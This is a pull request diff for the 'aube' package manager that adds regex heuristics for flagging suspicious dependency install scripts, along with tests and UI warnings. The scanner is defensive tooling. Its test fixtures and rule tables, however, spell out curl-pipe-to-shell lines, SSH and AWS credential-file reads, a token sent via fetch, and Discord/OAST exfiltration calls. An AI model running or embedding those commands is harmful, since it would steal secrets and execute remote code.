### PR TITLE
feat(install): content-sniff dep lifecycle scripts before approve-builds

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -435,6 +435,7 @@ dependencies = [
  "landlock",
  "libc",
  "miette",
+ "regex",
  "seccompiler",
  "thiserror 2.0.18",
  "tokio",

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -121,6 +121,13 @@ tracing = "0.1"
 tracing-subscriber = { version = "0.3", features = ["env-filter", "json"] }
 log = "0.4"
 
+# Pattern matching. Used by aube-scripts/src/content_sniff.rs to detect
+# dangerous shapes (curl|sh, eval+atob, secret-env exfil, webhook
+# endpoints, …) in dependency lifecycle script bodies before the user
+# is prompted to allow them. Already a transitive via pluralizer +
+# yamlpatch, so adding as a direct dep here is free at compile time.
+regex = "1"
+
 # Archive extraction
 flate2 = { version = "1", default-features = false, features = ["zlib-ng"] }
 tar = "0.4"

--- a/crates/aube-codes/src/warnings.rs
+++ b/crates/aube-codes/src/warnings.rs
@@ -17,6 +17,7 @@ pub const WARN_AUBE_HOOK_PACKAGE_ADDED: &str = "WARN_AUBE_HOOK_PACKAGE_ADDED";
 
 // ── install lifecycle ───────────────────────────────────────────────
 pub const WARN_AUBE_IGNORED_BUILD_SCRIPTS: &str = "WARN_AUBE_IGNORED_BUILD_SCRIPTS";
+#[rustfmt::skip] pub const WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT: &str = "WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT";
 #[rustfmt::skip] pub const WARN_AUBE_WINDOWS_JOB_OBJECT_UNAVAILABLE: &str = "WARN_AUBE_WINDOWS_JOB_OBJECT_UNAVAILABLE";
 pub const WARN_AUBE_MISSING_INTEGRITY: &str = "WARN_AUBE_MISSING_INTEGRITY";
 pub const WARN_AUBE_CACHE_WRITE_FAILED: &str = "WARN_AUBE_CACHE_WRITE_FAILED";
@@ -159,6 +160,12 @@ pub const ALL: &[CodeMeta] = &[
         name: WARN_AUBE_IGNORED_BUILD_SCRIPTS,
         category: category::INSTALL_LIFECYCLE,
         description: "Dep had `preinstall`/`install`/`postinstall` scripts but isn't on the `allowBuilds` allowlist. Run `aube approve-builds`.",
+        exit_code: None,
+    },
+    CodeMeta {
+        name: WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT,
+        category: category::INSTALL_LIFECYCLE,
+        description: "A dependency's lifecycle script matched a dangerous-shape heuristic (curl|sh, eval+atob, credential-file read, secret-env exfil, exfil endpoint, bare-IP HTTP). Advisory only; the `allowBuilds` allowlist still gates execution. Inspect the script before approving the build.",
         exit_code: None,
     },
     CodeMeta {

--- a/crates/aube-scripts/Cargo.toml
+++ b/crates/aube-scripts/Cargo.toml
@@ -23,6 +23,11 @@ tokio = { workspace = true }
 thiserror = { workspace = true }
 miette = { workspace = true }
 tracing = { workspace = true }
+# content_sniff.rs compiles a fixed set of patterns once via OnceLock
+# and matches them against dependency lifecycle script bodies. Already
+# in the dep graph transitively via pluralizer + yamlpatch — adding as
+# a direct dep keeps the workspace honest about who actually uses it.
+regex = { workspace = true }
 
 [target.'cfg(target_os = "linux")'.dependencies]
 landlock = { workspace = true }

--- a/crates/aube-scripts/src/content_sniff.rs
+++ b/crates/aube-scripts/src/content_sniff.rs
@@ -99,10 +99,11 @@ struct Rule {
 const RULES: &[Rule] = &[
     Rule {
         kind: SuspicionKind::ShellPipe,
-        // `curl …` or `wget …` followed eventually by `| sh|bash|zsh|node`.
-        // `[^\n]*?` keeps the match within one line so multi-line scripts
-        // don't bridge unrelated commands.
-        pattern: r"(?i)\b(?:curl|wget)\b[^\n]*?\|\s*(?:sh|bash|zsh|node)\b",
+        // `curl …` or `wget …` followed eventually by `| sh|bash|zsh|node`,
+        // including the path-qualified variants `| /bin/sh`,
+        // `| /usr/local/bin/bash`, etc. `[^\n]*?` keeps the match within
+        // one line so multi-line scripts don't bridge unrelated commands.
+        pattern: r"(?i)\b(?:curl|wget)\b[^\n]*?\|\s*(?:[/\w]*/)?(?:sh|bash|zsh|node)\b",
     },
     Rule {
         kind: SuspicionKind::EvalDecode,
@@ -116,11 +117,15 @@ const RULES: &[Rule] = &[
     },
     Rule {
         kind: SuspicionKind::SecretEnvRead,
-        // `process.env.X_TOKEN`, `process.env.AWS_SECRET_ACCESS_KEY`,
-        // `process.env.SOMETHING_API_KEY`, etc. The leading
-        // identifier characters keep `process.env.NODE_DEBUG` from
-        // matching by requiring the secret suffix to actually appear.
-        pattern: r"\bprocess\s*\.\s*env\s*\.\s*[A-Z][A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|API_?KEY|ACCESS_KEY|PRIVATE_KEY|AUTH)\b",
+        // `process.env.TOKEN`, `process.env.NPM_TOKEN`,
+        // `process.env.AWS_SECRET_ACCESS_KEY`, etc. The prefix and
+        // suffix character classes are zero-or-more so the bare
+        // keyword form (`process.env.TOKEN`) matches without needing a
+        // surrounding identifier — without that, greedy backtracking
+        // never repositions the alternation onto the keyword's first
+        // character. The keyword still has to appear verbatim, which
+        // keeps `process.env.NODE_DEBUG` from flagging.
+        pattern: r"\bprocess\s*\.\s*env\s*\.\s*[A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|API_?KEY|ACCESS_KEY|PRIVATE_KEY|AUTH)[A-Z0-9_]*\b",
     },
     Rule {
         kind: SuspicionKind::ExfilEndpoint,
@@ -128,7 +133,13 @@ const RULES: &[Rule] = &[
     },
     Rule {
         kind: SuspicionKind::BareIpHttp,
-        pattern: r"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/]|$)",
+        // Trailing class catches the post-octet character in every
+        // shape exfil scripts actually use: `/`, `:`, end-of-text,
+        // whitespace (line break or space-delimited curl flag),
+        // quote / paren / `?` / `#`. `.` is intentionally excluded so
+        // DNS hosts that happen to lead with four digit-groups
+        // (`1.2.3.4.example.com`) don't flag.
+        pattern: r#"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/\s'"?#)]|$)"#,
     },
 ];
 
@@ -209,6 +220,17 @@ mod tests {
     }
 
     #[test]
+    fn path_qualified_shell_flags() {
+        // `| /bin/sh`, `| /usr/local/bin/bash` etc. are common
+        // exfil-script variants that bypass a bare-name anchor.
+        let m = manifest_with(
+            "postinstall",
+            "curl https://example.com/install.sh | /bin/sh",
+        );
+        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
+    }
+
+    #[test]
     fn curl_to_file_does_not_flag_pipe() {
         // `curl -o file.tar.gz` is the prebuild-install / sharp shape —
         // common and benign. Only the pipe-to-shell form should flag.
@@ -283,6 +305,35 @@ mod tests {
     }
 
     #[test]
+    fn process_env_bare_token_flags() {
+        // The bare-keyword form (no surrounding identifier prefix)
+        // is the simplest exfil shape and the one a prefix-greedy
+        // regex would miss via mismatched backtracking.
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'fetch(x, {body: process.env.TOKEN})'",
+        );
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::SecretEnvRead]
+        );
+    }
+
+    #[test]
+    fn process_env_token_with_trailing_suffix_flags() {
+        // `[A-Z0-9_]*` suffix handles `_VALUE`, `_RAW`, etc. without
+        // breaking the `\b` anchor.
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'console.log(process.env.NPM_TOKEN_VALUE)'",
+        );
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::SecretEnvRead]
+        );
+    }
+
+    #[test]
     fn process_env_aws_secret_access_key_flags() {
         let m = manifest_with(
             "postinstall",
@@ -347,8 +398,46 @@ mod tests {
     }
 
     #[test]
+    fn bare_ip_no_path_followed_by_flag_flags() {
+        // `curl http://1.2.3.4 -o file` — space terminates the host.
+        let m = manifest_with("install", "curl http://192.0.2.5 -o payload");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
+    fn bare_ip_inside_quoted_url_flags() {
+        // `fetch('http://1.2.3.4')` — single-quote terminates the host.
+        let m = manifest_with("postinstall", "fetch('http://192.0.2.5')");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
+    fn bare_ip_on_separate_line_flags() {
+        // Multi-line script with the bare IP not at end-of-text —
+        // `$` would miss this without the `\s` branch in the class.
+        let m = manifest_with(
+            "postinstall",
+            "node setup.js\nwget http://192.0.2.5\necho done",
+        );
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
     fn dns_name_does_not_flag_as_bare_ip() {
         let m = manifest_with("install", "curl http://registry.npmjs.org/path");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(!k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
+    fn dns_with_ip_prefix_does_not_flag_as_bare_ip() {
+        // `1.2.3.4.example.com` is a hostname (not a bare IP) and
+        // shouldn't flag — `.` is intentionally not in the trailing
+        // class so the regex declines this shape.
+        let m = manifest_with("install", "curl http://1.2.3.4.example.com/path");
         let k = kinds(&sniff_lifecycle(&m));
         assert!(!k.contains(&SuspicionKind::BareIpHttp));
     }

--- a/crates/aube-scripts/src/content_sniff.rs
+++ b/crates/aube-scripts/src/content_sniff.rs
@@ -1,0 +1,404 @@
+//! Lightweight content scanner for dependency lifecycle script
+//! bodies.
+//!
+//! Pattern-matches dangerous shapes — shell-pipe (`curl … | sh`),
+//! base64-deobfuscation (`eval(atob(…))`), credential-file reads
+//! (`~/.ssh`, `~/.npmrc`), secret-shaped `process.env` reads,
+//! exfiltration endpoints (Discord/Telegram webhooks, OAST hosts,
+//! bare-IP HTTP) — in a package's `preinstall` / `install` /
+//! `postinstall` scripts. Fired before the user is prompted to
+//! approve a build so the prompt can carry more than just
+//! `name@version`.
+//!
+//! Pure regex matching — no AST parse, no shell-quoting awareness.
+//! False positives are possible (an SDK that legitimately hits a
+//! Discord webhook from a `postinstall` would flag), but lifecycle
+//! script bodies are short and almost never contain bare
+//! `curl … | sh` legitimately, so the FP rate is low in practice.
+//!
+//! Sniffing is advisory: it never blocks an install or write. The
+//! existing `BuildPolicy` allowlist remains the only gate on
+//! whether scripts actually execute.
+
+use aube_manifest::PackageJson;
+use regex::Regex;
+use std::sync::OnceLock;
+
+/// Why a script body got flagged. Each variant carries a one-line
+/// `description` for the user-facing warning and a `category` tag
+/// used by interactive surfaces (`aube approve-builds` picker
+/// labels) that need a short marker.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+pub enum SuspicionKind {
+    /// `curl … | sh`, `wget … | bash`, and friends — fetch a remote
+    /// payload and pipe it to a shell.
+    ShellPipe,
+    /// `eval(atob(…))` / `Function(atob(…))` — runtime decoding of a
+    /// base64 string into executable code. Common dropper shape.
+    EvalDecode,
+    /// Reads from `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh` —
+    /// credential files a lifecycle script has no business touching.
+    CredentialFileRead,
+    /// Reads `process.env.*TOKEN`, `*SECRET`, `*API_KEY`, etc. —
+    /// secret-shaped env vars exfilled from CI.
+    SecretEnvRead,
+    /// `discord.com/api/webhooks/`, `api.telegram.org/bot`, OAST
+    /// collaborator hosts (`oast.pro`, `interactsh`, `webhook.site`,
+    /// `pipedream.net`, `ngrok.io`, …) — known exfil channels.
+    ExfilEndpoint,
+    /// `http://1.2.3.4/…` — bare-IP HTTP target. Legitimate packages
+    /// use DNS names; bare IPs are dropper / C2 staging.
+    BareIpHttp,
+}
+
+impl SuspicionKind {
+    pub fn description(self) -> &'static str {
+        match self {
+            Self::ShellPipe => "pipes downloaded content to a shell (curl | sh)",
+            Self::EvalDecode => "decodes and evaluates a base64 payload at runtime",
+            Self::CredentialFileRead => "reads from a credential file (~/.ssh, ~/.aws, ~/.npmrc)",
+            Self::SecretEnvRead => "reads a secret-shaped environment variable",
+            Self::ExfilEndpoint => "contacts a known exfiltration endpoint",
+            Self::BareIpHttp => "contacts a bare-IP HTTP host",
+        }
+    }
+
+    /// Short tag for compact UIs (picker labels). 1–2 words.
+    pub fn category(self) -> &'static str {
+        match self {
+            Self::ShellPipe => "curl|sh",
+            Self::EvalDecode => "eval+decode",
+            Self::CredentialFileRead => "creds read",
+            Self::SecretEnvRead => "secret env",
+            Self::ExfilEndpoint => "exfil URL",
+            Self::BareIpHttp => "bare-IP HTTP",
+        }
+    }
+}
+
+/// One match against a script body.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct Suspicion {
+    pub kind: SuspicionKind,
+    /// Name of the lifecycle hook whose body matched
+    /// (`preinstall` / `install` / `postinstall`).
+    pub hook: &'static str,
+}
+
+/// Lifecycle hook names sniffed. Mirrors [`crate::DEP_LIFECYCLE_HOOKS`]
+/// — `prepare` is excluded because aube doesn't run it for installed
+/// tarballs (only the root package and git-dep preparation), so
+/// flagging it would surface noise the user has no path to act on.
+const SNIFFED_HOOKS: &[&str] = &["preinstall", "install", "postinstall"];
+
+struct Rule {
+    kind: SuspicionKind,
+    pattern: &'static str,
+}
+
+const RULES: &[Rule] = &[
+    Rule {
+        kind: SuspicionKind::ShellPipe,
+        // `curl …` or `wget …` followed eventually by `| sh|bash|zsh|node`.
+        // `[^\n]*?` keeps the match within one line so multi-line scripts
+        // don't bridge unrelated commands.
+        pattern: r"(?i)\b(?:curl|wget)\b[^\n]*?\|\s*(?:sh|bash|zsh|node)\b",
+    },
+    Rule {
+        kind: SuspicionKind::EvalDecode,
+        pattern: r"(?i)\b(?:eval|Function)\s*\([^)]*\b(?:atob|Buffer\s*\.\s*from)\b",
+    },
+    Rule {
+        kind: SuspicionKind::CredentialFileRead,
+        // `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh`, plus the
+        // `$HOME/…` and `${HOME}/…` shell-expansion variants.
+        pattern: r"(?:~|\$\{?HOME\}?)/(?:\.ssh|\.aws|\.npmrc|\.config/gh)\b",
+    },
+    Rule {
+        kind: SuspicionKind::SecretEnvRead,
+        // `process.env.X_TOKEN`, `process.env.AWS_SECRET_ACCESS_KEY`,
+        // `process.env.SOMETHING_API_KEY`, etc. The leading
+        // identifier characters keep `process.env.NODE_DEBUG` from
+        // matching by requiring the secret suffix to actually appear.
+        pattern: r"\bprocess\s*\.\s*env\s*\.\s*[A-Z][A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|API_?KEY|ACCESS_KEY|PRIVATE_KEY|AUTH)\b",
+    },
+    Rule {
+        kind: SuspicionKind::ExfilEndpoint,
+        pattern: r"(?i)\b(?:discord(?:app)?\.com/api/webhooks/|api\.telegram\.org/bot|burpcollaborator\.net|interactsh\.com|oast\.(?:pro|live|fun|me|site|us|asia)|requestbin\.com|webhook\.site|pipedream\.net|ngrok\.io)",
+    },
+    Rule {
+        kind: SuspicionKind::BareIpHttp,
+        pattern: r"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/]|$)",
+    },
+];
+
+fn compiled() -> &'static [(SuspicionKind, Regex)] {
+    static COMPILED: OnceLock<Vec<(SuspicionKind, Regex)>> = OnceLock::new();
+    COMPILED.get_or_init(|| {
+        RULES
+            .iter()
+            .map(|r| {
+                // RULES is a fixed compile-time table that ships with
+                // aube-scripts, so a bad pattern is a programmer bug
+                // we want to know about at startup, not silently swallow.
+                let re = Regex::new(r.pattern)
+                    .expect("content_sniff rule failed to compile - fix the pattern");
+                (r.kind, re)
+            })
+            .collect()
+    })
+}
+
+/// Scan a dep's manifest for suspicious lifecycle script bodies.
+/// Returns one [`Suspicion`] per (hook, rule) pair that matched.
+/// Empty result for packages with no scripts or no matches.
+pub fn sniff_lifecycle(manifest: &PackageJson) -> Vec<Suspicion> {
+    let mut out = Vec::new();
+    for hook in SNIFFED_HOOKS {
+        let Some(body) = manifest.scripts.get(*hook) else {
+            continue;
+        };
+        for (kind, re) in compiled() {
+            if re.is_match(body) {
+                out.push(Suspicion { kind: *kind, hook });
+            }
+        }
+    }
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::collections::BTreeMap;
+
+    fn manifest_with(hook: &str, body: &str) -> PackageJson {
+        let mut scripts = BTreeMap::new();
+        scripts.insert(hook.to_string(), body.to_string());
+        PackageJson {
+            scripts,
+            ..PackageJson::default()
+        }
+    }
+
+    fn kinds(s: &[Suspicion]) -> Vec<SuspicionKind> {
+        s.iter().map(|x| x.kind).collect()
+    }
+
+    #[test]
+    fn empty_manifest_is_clean() {
+        assert!(sniff_lifecycle(&PackageJson::default()).is_empty());
+    }
+
+    #[test]
+    fn benign_postinstall_is_clean() {
+        let m = manifest_with("postinstall", "node ./scripts/copy-types.js");
+        assert!(sniff_lifecycle(&m).is_empty());
+    }
+
+    #[test]
+    fn classic_curl_sh_flags() {
+        let m = manifest_with("postinstall", "curl https://example.com/install.sh | sh");
+        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
+    }
+
+    #[test]
+    fn wget_pipe_bash_flags() {
+        let m = manifest_with("install", "wget -qO- http://x.test/i | bash");
+        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
+    }
+
+    #[test]
+    fn curl_to_file_does_not_flag_pipe() {
+        // `curl -o file.tar.gz` is the prebuild-install / sharp shape —
+        // common and benign. Only the pipe-to-shell form should flag.
+        let m = manifest_with(
+            "install",
+            "curl -L https://github.com/x/y/releases/download/v1/y-linux.tar.gz -o y.tar.gz",
+        );
+        assert!(sniff_lifecycle(&m).is_empty());
+    }
+
+    #[test]
+    fn eval_atob_flags() {
+        let m = manifest_with("preinstall", "node -e \"eval(atob('cGF5bG9hZA=='))\"");
+        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::EvalDecode]);
+    }
+
+    #[test]
+    fn function_buffer_from_flags() {
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'new Function(Buffer.from(p, \"base64\").toString())()'",
+        );
+        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::EvalDecode]);
+    }
+
+    #[test]
+    fn ssh_dir_read_flags() {
+        let m = manifest_with("postinstall", "cat ~/.ssh/id_rsa | base64");
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::CredentialFileRead]
+        );
+    }
+
+    #[test]
+    fn home_npmrc_read_flags() {
+        let m = manifest_with("postinstall", "cat $HOME/.npmrc");
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::CredentialFileRead]
+        );
+    }
+
+    #[test]
+    fn brace_home_aws_read_flags() {
+        let m = manifest_with("postinstall", "tar c ${HOME}/.aws/credentials");
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::CredentialFileRead]
+        );
+    }
+
+    #[test]
+    fn config_gh_read_flags() {
+        let m = manifest_with("postinstall", "cat ~/.config/gh/hosts.yml");
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::CredentialFileRead]
+        );
+    }
+
+    #[test]
+    fn process_env_npm_token_flags() {
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'fetch(\"https://h.test\", {body: process.env.NPM_TOKEN})'",
+        );
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::SecretEnvRead]
+        );
+    }
+
+    #[test]
+    fn process_env_aws_secret_access_key_flags() {
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'console.log(process.env.AWS_SECRET_ACCESS_KEY)'",
+        );
+        assert_eq!(
+            kinds(&sniff_lifecycle(&m)),
+            vec![SuspicionKind::SecretEnvRead]
+        );
+    }
+
+    #[test]
+    fn process_env_node_debug_does_not_flag() {
+        // Common, benign env read. Confirms the secret-suffix anchor
+        // is doing its job.
+        let m = manifest_with(
+            "postinstall",
+            "node -e 'if (process.env.NODE_DEBUG) console.log(\"debug\")'",
+        );
+        assert!(sniff_lifecycle(&m).is_empty());
+    }
+
+    #[test]
+    fn discord_webhook_flags() {
+        let m = manifest_with(
+            "postinstall",
+            "curl -X POST https://discord.com/api/webhooks/123/abc -d @-",
+        );
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
+    }
+
+    #[test]
+    fn telegram_bot_flags() {
+        let m = manifest_with(
+            "postinstall",
+            "curl -s 'https://api.telegram.org/bot$T/sendMessage?chat_id=1&text=ok'",
+        );
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
+    }
+
+    #[test]
+    fn webhook_site_flags() {
+        let m = manifest_with("postinstall", "curl https://webhook.site/abcd");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
+    }
+
+    #[test]
+    fn oast_pro_flags() {
+        let m = manifest_with("postinstall", "wget http://abc.oast.pro/$(whoami)");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
+    }
+
+    #[test]
+    fn bare_ip_http_flags() {
+        let m = manifest_with("install", "curl http://192.0.2.5:8080/payload");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
+    fn dns_name_does_not_flag_as_bare_ip() {
+        let m = manifest_with("install", "curl http://registry.npmjs.org/path");
+        let k = kinds(&sniff_lifecycle(&m));
+        assert!(!k.contains(&SuspicionKind::BareIpHttp));
+    }
+
+    #[test]
+    fn multiple_hooks_report_separately() {
+        let mut scripts = BTreeMap::new();
+        scripts.insert(
+            "preinstall".to_string(),
+            "curl https://x.test/i | sh".to_string(),
+        );
+        scripts.insert("postinstall".to_string(), "cat ~/.ssh/id_rsa".to_string());
+        let m = PackageJson {
+            scripts,
+            ..PackageJson::default()
+        };
+        let s = sniff_lifecycle(&m);
+        assert_eq!(s.len(), 2);
+        assert!(
+            s.iter()
+                .any(|x| x.hook == "preinstall" && x.kind == SuspicionKind::ShellPipe)
+        );
+        assert!(
+            s.iter()
+                .any(|x| x.hook == "postinstall" && x.kind == SuspicionKind::CredentialFileRead)
+        );
+    }
+
+    #[test]
+    fn prepare_hook_is_not_sniffed() {
+        // `prepare` doesn't run for installed tarballs in aube, so
+        // flagging it would surface noise the user has no path to
+        // act on.
+        let m = manifest_with("prepare", "curl https://x.test/i | sh");
+        assert!(sniff_lifecycle(&m).is_empty());
+    }
+
+    #[test]
+    fn descriptions_and_categories_are_non_empty() {
+        // Sanity guard: every kind has user-facing strings.
+        for kind in [
+            SuspicionKind::ShellPipe,
+            SuspicionKind::EvalDecode,
+            SuspicionKind::CredentialFileRead,
+            SuspicionKind::SecretEnvRead,
+            SuspicionKind::ExfilEndpoint,
+            SuspicionKind::BareIpHttp,
+        ] {
+            assert!(!kind.description().is_empty());
+            assert!(!kind.category().is_empty());
+        }
+    }
+}

--- a/crates/aube-scripts/src/content_sniff.rs
+++ b/crates/aube-scripts/src/content_sniff.rs
@@ -28,7 +28,11 @@ use std::sync::OnceLock;
 /// `description` for the user-facing warning and a `category` tag
 /// used by interactive surfaces (`aube approve-builds` picker
 /// labels) that need a short marker.
-#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+///
+/// `Ord` / `PartialOrd` are derived (variant declaration order) so
+/// containers of `Suspicion` are sortable — needed by `Vec<Suspicion>:
+/// Ord` which in turn is needed by `IgnoredEntry`'s derived `Ord`.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
 pub enum SuspicionKind {
     /// `curl … | sh`, `wget … | bash`, and friends — fetch a remote
     /// payload and pipe it to a shell.
@@ -77,7 +81,7 @@ impl SuspicionKind {
 }
 
 /// One match against a script body.
-#[derive(Debug, Clone, PartialEq, Eq)]
+#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
 pub struct Suspicion {
     pub kind: SuspicionKind,
     /// Name of the lifecycle hook whose body matched

--- a/crates/aube-scripts/src/lib.rs
+++ b/crates/aube-scripts/src/lib.rs
@@ -12,6 +12,7 @@
 //!   escape-hatch `--dangerously-allow-all-builds` flag.
 //! - `--ignore-scripts` forces everything off, matching pnpm/npm.
 
+pub mod content_sniff;
 pub mod policy;
 
 #[cfg(target_os = "linux")]
@@ -20,6 +21,7 @@ mod linux_jail;
 #[cfg(windows)]
 mod windows_job;
 
+pub use content_sniff::{Suspicion, SuspicionKind, sniff_lifecycle};
 pub use policy::{AllowDecision, BuildPolicy, BuildPolicyError, pattern_matches};
 
 use aube_manifest::PackageJson;

--- a/crates/aube/src/commands/approve_builds.rs
+++ b/crates/aube/src/commands/approve_builds.rs
@@ -14,7 +14,7 @@
 use clap::Args;
 use miette::{Context, IntoDiagnostic, miette};
 use std::collections::{BTreeMap, BTreeSet, HashSet};
-use std::io::IsTerminal;
+use std::io::{IsTerminal, Write};
 use std::path::Path;
 
 const INTERACTIVE_TTY_ERROR: &str = "approve-builds needs stdin and stderr to be TTYs for the interactive picker; pass `--all` or name packages positionally to approve non-interactively";
@@ -249,14 +249,21 @@ fn dedupe(packages: Vec<String>) -> Vec<String> {
 /// `name@version`) keeps the written allowBuilds entry broad, so the
 /// next resolution with a patch-level bump doesn't silently drop back
 /// into the ignored set.
+///
+/// When any entry carries content-sniff suspicions, a one-shot summary
+/// is printed to stderr before the picker opens so the user sees the
+/// full list of flagged signals (the picker label only has room for
+/// a short tag). The picker entry itself is annotated with `⚠
+/// suspicious: <category>` so flagged rows stand out while scrolling.
 fn pick_interactively(
     ignored: &[super::ignored_builds::IgnoredEntry],
 ) -> miette::Result<Vec<String>> {
+    print_suspicion_summary(ignored);
     let mut picker = demand::MultiSelect::new("Choose which packages to allow building")
         .description("Space to toggle, Enter to confirm")
         .min(1);
     for entry in ignored {
-        let label = format!("{}@{}", entry.name, entry.version);
+        let label = format_picker_label(&entry.name, &entry.version, &entry.suspicions);
         picker = picker.option(demand::DemandOption::new(entry.name.clone()).label(&label));
     }
     picker
@@ -265,9 +272,63 @@ fn pick_interactively(
         .wrap_err("failed to read approve-builds selection")
 }
 
+/// `name@version` plus a compact suspicious-shape tag when the
+/// content-sniff fired against any of the package's lifecycle
+/// scripts. One picker row is narrow, so only the first match's
+/// category gets a tag; `+N more` follows when more than one
+/// matched. The full breakdown lives in `print_suspicion_summary`.
+fn format_picker_label(
+    name: &str,
+    version: &str,
+    suspicions: &[aube_scripts::Suspicion],
+) -> String {
+    if suspicions.is_empty() {
+        return format!("{name}@{version}");
+    }
+    let first = suspicions[0].kind.category();
+    let extra = suspicions.len() - 1;
+    if extra == 0 {
+        format!("{name}@{version}  ⚠ suspicious: {first}")
+    } else {
+        format!("{name}@{version}  ⚠ suspicious: {first} +{extra} more")
+    }
+}
+
+/// Print every flagged package's full suspicion list to stderr before
+/// the picker takes over the screen. No-op when nothing flagged so
+/// the clean case stays terse.
+fn print_suspicion_summary(ignored: &[super::ignored_builds::IgnoredEntry]) {
+    let flagged: Vec<&super::ignored_builds::IgnoredEntry> = ignored
+        .iter()
+        .filter(|e| !e.suspicions.is_empty())
+        .collect();
+    if flagged.is_empty() {
+        return;
+    }
+    let mut stderr = std::io::stderr().lock();
+    let _ = writeln!(
+        stderr,
+        "⚠ {} package(s) have lifecycle scripts that matched dangerous-shape heuristics:",
+        flagged.len()
+    );
+    for entry in flagged {
+        let _ = writeln!(stderr, "  {}@{}", entry.name, entry.version);
+        for sus in &entry.suspicions {
+            let _ = writeln!(stderr, "    • {} — {}", sus.hook, sus.kind.description());
+        }
+    }
+    let _ = writeln!(
+        stderr,
+        "  Inspect each script in `node_modules/.aube/<dep_path>/node_modules/<name>/package.json` before approving."
+    );
+}
+
 fn pick_global_interactively(
     global_ignored: &[GlobalIgnored],
 ) -> miette::Result<BTreeMap<std::path::PathBuf, Vec<String>>> {
+    for entry in global_ignored {
+        print_suspicion_summary(&entry.ignored);
+    }
     let mut picker = demand::MultiSelect::new("Choose which global packages to allow building")
         .description("Space to toggle, Enter to confirm")
         .min(1);
@@ -277,7 +338,8 @@ fn pick_global_interactively(
             // split_once below keeps the full package name even if a
             // private registry allows ':' inside it.
             let value = format!("{idx}:{}", ignored.name);
-            let label = format!("{aliases}: {}@{}", ignored.name, ignored.version);
+            let base = format_picker_label(&ignored.name, &ignored.version, &ignored.suspicions);
+            let label = format!("{aliases}: {base}");
             picker = picker.option(demand::DemandOption::new(value).label(&label));
         }
     }
@@ -303,4 +365,52 @@ fn pick_global_interactively(
             .push(name.to_string());
     }
     Ok(selected)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::format_picker_label;
+    use aube_scripts::{Suspicion, SuspicionKind};
+
+    #[test]
+    fn label_for_clean_package_is_bare_spec() {
+        assert_eq!(
+            format_picker_label("esbuild", "0.20.2", &[]),
+            "esbuild@0.20.2"
+        );
+    }
+
+    #[test]
+    fn label_for_single_suspicion_shows_category() {
+        let s = vec![Suspicion {
+            kind: SuspicionKind::ShellPipe,
+            hook: "postinstall",
+        }];
+        assert_eq!(
+            format_picker_label("lodass", "1.0.0", &s),
+            "lodass@1.0.0  ⚠ suspicious: curl|sh"
+        );
+    }
+
+    #[test]
+    fn label_for_multiple_suspicions_shows_first_plus_count() {
+        let s = vec![
+            Suspicion {
+                kind: SuspicionKind::ShellPipe,
+                hook: "postinstall",
+            },
+            Suspicion {
+                kind: SuspicionKind::SecretEnvRead,
+                hook: "postinstall",
+            },
+            Suspicion {
+                kind: SuspicionKind::ExfilEndpoint,
+                hook: "postinstall",
+            },
+        ];
+        assert_eq!(
+            format_picker_label("evil-pkg", "9.9.9", &s),
+            "evil-pkg@9.9.9  ⚠ suspicious: curl|sh +2 more"
+        );
+    }
